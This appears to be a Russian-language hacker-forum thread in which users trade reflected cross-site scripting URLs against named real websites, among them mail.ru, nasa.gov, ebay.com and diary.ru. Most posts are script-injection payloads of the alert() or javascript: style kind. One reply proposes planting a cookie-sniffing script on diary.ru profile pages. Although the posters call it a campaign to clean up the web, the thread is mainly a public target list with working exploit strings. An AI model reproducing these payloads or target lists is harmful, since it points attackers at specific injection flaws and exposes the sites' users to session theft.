кавказцентр мне насильно дали ссылку =))))
я им выложил, и сюда тож на всяк выложил.
этот баг я нашол на галереи форумов vbulletin, хз но я не видел чтобы до меня кто-то описвал ентот баг, смотри мои сайты, там есть еще парочку сайтов с такой уязвимостью, на них тоже стоит vbulletin.
это не совсем ошибка.
p.s. скоро еще опубликую список бажных сайтов.

Присоединяемся к акции вылечим инет от xss. Вот от меня кое-что
http://www.rap.ru/artists/&pos_id=7143"><script>alert(/kot777/)</script>
http://www.supreme2.ru/s2/diary/comments/comments.php?id=01_10_05'><script>alert(/kot777/)</script>
http://www.e-pravo.ru/search.php?category=12'><script>alert(/kot777/)</script>
http://webz.priop.ru/index.php?categ=%27
http://www.persons.am/ru/search.php?category=19'><script>alert(/kot777/)</script>
http://www.oberon.ru/magazine_page.php?page_id=5"><script>alert(/kot777/)</script>
http://www.exodist.net/index.php?start=70"><script>alert(/kot777/)</script>
http://www.dolgopa.org/index.php?ids=323"><script>alert(/kot777/)</script>
http://gorodok.samaratoday.ru/webpage.php?id=7"><script>alert(/kot777/)</script>

__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?

А на http://www.diary.ru/ у тебя часом ничего нет?

и мой скромный

http://mobile.mail.ru/catalog/content_get.php?tab=3&content_id=21161"><script>co nfirm('hi-hi')</script><a%20"

http://www.openet.ru/University.nsf/Index.htm!Open&Menu=VPMain&VPID=965"%20style=backg round:url(javascript:alert());"
http://www.cracklab.ru/xxx/ [POST] " style=background:url(javascript:alert());"
http://www.freedisk.ru/guide.php?cat=11"><script>alert()</script>
http://www.rabota.ru/search/vacancy/?search='"><script>alert()</script>
http://www.forum.md/Albums.aspx?soundslike=<xml>
http://nasa.org/static.asp?search_te...arch_source=20
http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=66&start=11"><script>alert( )</script>
http://www.999.md/results.asp?criter...lng=1&topic=-1
http://search.ebay.com/search/search.dll?sofocus=bs&sbrftog=1&fcl=4&from=R10&cat ref=C12&satitle=fur+trim*&sacat=63862%26catref%3DC 6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=-24<script>alert()</script>&a22868=-24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=1&alist=a54 %2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801&pf_query=fur+t rim*&sargn=-1%26saslc%3D2&sadis=200&fpos=94062&sappl=1&ftrt=1& ftrv=1&sabdlo=&sabdhi=&saprclo="><script>alert(5)</script>&saprchi='"><script>alert(/k1b0rg/)</script>
http://www.diary.ru/interest/?q=%22style=background:url(javascript:alert());"

Вот тчо за Мода пошла что вы с ними делать собираетесь колекционировать?

Насчет http://www.diary.ru/
как я понял там даеться http://www.diary.ru/~вася может вэто вася вставить ну скриптик со снифером?
Тк сайт один же.

http://www.diary.ru/list/?sort=XSS
воть те XSS

а чтобы были, может инет в будующем избавиться от таких глупых ошибок, секьюрити сайты сразу залатали эти баги, после того как я опубликовал.
а сайты типа pro-hack skvoznoy zloy, они нифига не латают.
я хочу чтобы инет, перестал содержать такие ошибки, конечно это нереально такое сделать ,но хоть чучуть я сделаю его почище

Не знаю как вы, но я уважаю "k1b0rg" и этот сайт!!!
Огрромный Респект...........всем его пользователям
для k1b0rg
- ну чё там с чатом?! кодта топ дашь?